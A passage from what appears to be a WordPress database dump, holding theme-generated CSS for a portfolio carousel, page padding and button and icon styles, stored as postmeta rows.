.post-head-wrapper,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list .post-entry-wrapper {\r\n  right: 30px;\r\n  left: 30px;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list .post-entry-content {\r\n  background: none;\r\n  padding: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list .post-entry-wrapper {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list .post-entry-wrapper {\r\n  bottom: -15px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\r\n  bottom: -5px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\r\n  bottom: -20px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\r\n  bottom: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .filter a,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .filter a * {\r\n  color: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .paginator a,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .paginator a * {\r\n  color: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .filter-bg-decoration .filter-categories a.act {\r\n  color: #fff;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.mode-masonry) article {\r\n  margin-top: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.mode-masonry) article:first-of-type,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on:not(.mode-masonry) article {\r\n  margin-top: 0;\r\n  padding-top: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on:not(.mode-masonry) article:first-of-type,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.hover-scale article:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list article {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-wrap {\r\n  padding: 20px 20px 0px 20px;\r\n  border-radius: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-wrap *,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-rollover:after {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.enable-bg-rollover .post-thumbnail-rollover:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.bottom-overlap-layout-list.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container {\r\n  height: calc(100% - 100px);\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a {\r\n  width: 44px;\r\n  height: 44px;\r\n  line-height: 44px;\r\n  border-radius: 100px;\r\n  margin: 10px 5px 10px;\r\n}\r\n.content-rollover-layout-list:not(.content-align-center).portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a,\r\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a {\r\n  margin: 10px 10px 10px 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:before,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:after {\r\n  border-width: 0px;\r\n}\r\n.dt-icon-bg-on.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:before {\r\n  background: rgba(255,255,255,0.3);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.dt-icon-hover-bg-on.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:after {\r\n  background: rgba(255,255,255,0.5);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a > span:before {\r\n  font-size: 16px;\r\n  line-height: 44px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:not(:hover) > span {\r\n  color: #ffffff;\r\n  background: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-links-container a:hover > span {\r\n  color: #ffffff;\r\n  background: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-title,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.owl-carousel .entry-title {\r\n  margin-bottom: 5px;\r\n  font-size: 22px;\r\n  line-height: 32px;\r\n  font-style: ;\r\n  font-weight: bold;\r\n  text-transform: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-meta {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-meta * {\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .portfolio-categories {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-excerpt {\r\n  margin-bottom: 5px;\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.centered-layout-list) .post-entry-content {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\r\n  padding: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list .post-entry-content {\r\n  border-radius: 0px;\r\n}\r\n@media screen and (max-width: ) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa article {\r\n    -webkit-flex-flow: column nowrap;\r\n    -moz-flex-flow: column nowrap;\r\n    -ms-flex-flow: column nowrap;\r\n    flex-flow: column nowrap;\r\n    margin-top: 20px;\r\n  }\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on article {\r\n    border: none;\r\n  }\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.centered-layout-list article {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-wrap,\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-entry-content {\r\n    width: 100%;\r\n    margin: 0;\r\n    top: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-thumbnail-wrap {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-entry-content:after {\r\n    display: none;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .project-even .post-thumbnail-wrap,\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.centered-layout-list .post-thumbnail-wrap {\r\n    -webkit-order: 0;\r\n    -moz-order: 0;\r\n    -ms-flex-order: 0;\r\n    order: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.centered-layout-list .post-entry-title-content {\r\n    -webkit-order: 1;\r\n    -moz-order: 1;\r\n    -ms-flex-order: 1;\r\n    order: 1;\r\n    width: 100%;\r\n    padding: 20px 20px 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.centered-layout-list .post-entry-content {\r\n    -webkit-order: 2;\r\n    -moz-order: 2;\r\n    -ms-flex-order: 2;\r\n    order: 2;\r\n    padding-top: 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-entry-content {\r\n    padding: 20px;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-title {\r\n    margin: 3px 0 5px;\r\n    font-size: 20px;\r\n    line-height: 26px;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-meta {\r\n    margin: 5px 0 5px;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .entry-excerpt {\r\n    margin: 15px 0 0;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-details {\r\n    margin: 5px 0 10px;\r\n  }\r\n  #page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .post-details.details-type-link {\r\n    margin-bottom: 2px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid {\r\n  grid-row-gap: *2;\r\n  grid-column-gap: *2;\r\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid {\r\n  display: flex;\r\n  flex-flow: row wrap;\r\n  margin: -;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\r\n  flex: 1 0 ;\r\n  min-width: ;\r\n  max-width: 100%;\r\n  padding: ;\r\n  box-sizing: border-box;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n  grid-template-columns: repeat(,1fr);\r\n  grid-template-rows: auto;\r\n  grid-column-gap: *2;\r\n  grid-row-gap: *2;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n  margin: -;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell {\r\n  width: 100%/;\r\n  padding: ;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n  width: calc(100%/) * 2;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\r\n  grid-row-gap: *2 - 30px;\r\n}\r\n@media screen and (max-width: 1199px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%/;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%/)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 991px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%/;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%/)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 767px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%/;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%/)*2;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a {\r\n  width: 36px;\r\n  height: 36px;\r\n  border-radius: 500px;\r\n}\r\n.dt-arrow-border-on.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a:not(:hover):before {\r\n  border-width: 0px;\r\n}\r\n.dt-arrow-hover-border-on.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a:hover:after {\r\n  border-width: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-prev {\r\n  top: 50%;\r\n  transform: translateY(calc(-50% + 0px));\r\n  left: -43px;\r\n}\r\n@media all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-prev {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-prev i {\r\n  padding: 0px 0px 0px 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-next {\r\n  top: 50%;\r\n  transform: translateY(calc(-50% + 0px));\r\n  right: -43px;\r\n}\r\n@media all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-next {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a.owl-next i {\r\n  padding: 0px 0px 0px 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav i {\r\n  font-size: 32px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a:not(:hover) i,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-nav a:not(:hover) i:before {\r\n  color: rgba(0,0,0,0.15);\r\n  background: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dots {\r\n  top: calc(100% + 20px);\r\n  left: 50%;\r\n  transform: translateX(calc(-50% + 0px));\r\n}\r\n@media all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dots {\r\n    transform: translateX(-50%);\r\n    margin-left: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dot {\r\n  width: 10px;\r\n  height: 10px;\r\n  margin: 0 8px;\r\n}\r\n.bullets-ubax.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dot.active span {\r\n  border-color: ;\r\n}\r\n@media screen and (max-width: 778px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.hide-arrows .owl-nav a {\r\n    display: none;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-prev {\r\n    top: 50%;\r\n    transform: translateY(calc(-50% + 0px));\r\n    left: 10px;\r\n  }\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-next {\r\n    top: 50%;\r\n    transform: translateY(calc(-50% + 0px));\r\n    right: 10px;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-prev {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-next {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dots {\r\n  top: calc(100% + 20px);\r\n  left: 50%;\r\n  transform: translateX(calc(-50% + 0px));\r\n}\r\n@media all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dots {\r\n    transform: translateX(-50%);\r\n    margin-left: 0px;\r\n  }\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dot {\r\n  width: 10px;\r\n  height: 10px;\r\n  margin: 0 8px;\r\n}\r\n.bullets-ubax.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .owl-dot.active span {\r\n  border-color: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.enable-img-shadow .owl-stage-outer {\r\n  padding: 34px 0;\r\n}\r\n@media screen and (max-width: 778px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.hide-arrows .owl-nav a {\r\n    display: none;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-prev {\r\n    top: 50%;\r\n    transform: translateY(calc(-50% + 0px));\r\n    left: 10px;\r\n  }\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-next {\r\n    top: 50%;\r\n    transform: translateY(calc(-50% + 0px));\r\n    right: 10px;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-prev {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n@media screen and (max-width: 778px) and all and (-ms-high-contrast: none) {\r\n  .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.reposition-arrows .owl-nav .owl-next {\r\n    transform: translateY(-50%);\r\n    margin-top: 0px;\r\n  }\r\n}\r\n'),
(6089,2167,'_dt_mobile_page_padding_top','0px'),
(6090,2167,'_dt_mobile_page_padding_bottom','0px'),
(6091,2167,'the7_fancy_title_css','#main {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n@media screen and (max-width: 778px) {\n  #main {\n    padding-top: 0px;\n    padding-bottom: 0px;\n  }\n}\n'),
(6092,2167,'the7_shortcodes_dynamic_css','a:3:{s:32:\"9257017e3164acfe496e3c83a6227e7a\";s:185:\"#default-btn-9257017e3164acfe496e3c83a6227e7a.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-9257017e3164acfe496e3c83a6227e7a > i {\n  margin-right: 8px;\n}\n\";s:32:\"6d8ead28084f2f7cc7e24255d8bfbd9e\";s:185:\"#default-btn-6d8ead28084f2f7cc7e24255d8bfbd9e.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-6d8ead28084f2f7cc7e24255d8bfbd9e > i {\n  margin-right: 8px;\n}\n\";s:32:\"d90d528f09bfcbe57894150915174d20\";s:5761:\".icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon {\n  width: 60px;\n  height: 60px;\n  line-height: 60px;\n  font-size: 32px;\n  border-radius: 200px;\n  margin: 0px 0px 0px 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner {\n  min-width: 60px;\n  min-height: 60px;\n  border-radius: 200px;\n}\n@media all and (-ms-high-contrast: none) {\n  .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner {\n    height: 60px;\n  }\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .dt-hover-icon {\n  line-height: 60px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon:before,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon:after,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner:before,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner:after {\n  min-width: 100%;\n  min-height: 100%;\n  padding: inherit;\n  border-radius: inherit;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-width: 2px;\n  border-style: solid;\n}\n.dt-icon-border-dashed.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n 